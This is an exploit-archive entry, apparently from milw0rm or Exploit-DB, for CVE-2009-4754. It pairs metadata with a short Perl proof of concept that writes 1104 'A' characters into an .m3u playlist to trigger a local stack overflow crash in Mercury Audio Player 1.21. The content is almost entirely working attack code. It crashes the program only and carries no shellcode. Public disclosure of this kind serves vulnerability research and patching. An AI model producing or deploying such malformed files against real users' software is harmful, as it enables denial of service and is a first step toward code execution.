Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)

Author: SirGod
type: dos
platform: windows
port: 
date_added: 2009-04-29  
date_updated:   
verified: 1  
codes: OSVDB-63343;CVE-2009-4754  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8578.pl  
###################################################################################
####      Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC      #####
####       Discovered by SirGod  -  www.mortal-team.net                       #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";

# milw0rm.com [2009-04-30]